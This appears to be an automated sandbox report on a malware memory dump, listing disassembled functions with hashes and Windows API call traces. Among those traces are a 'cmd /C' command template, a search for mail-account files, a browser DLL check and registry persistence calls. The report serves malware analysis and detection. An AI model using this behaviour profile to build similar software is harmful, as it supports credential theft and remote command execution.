  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
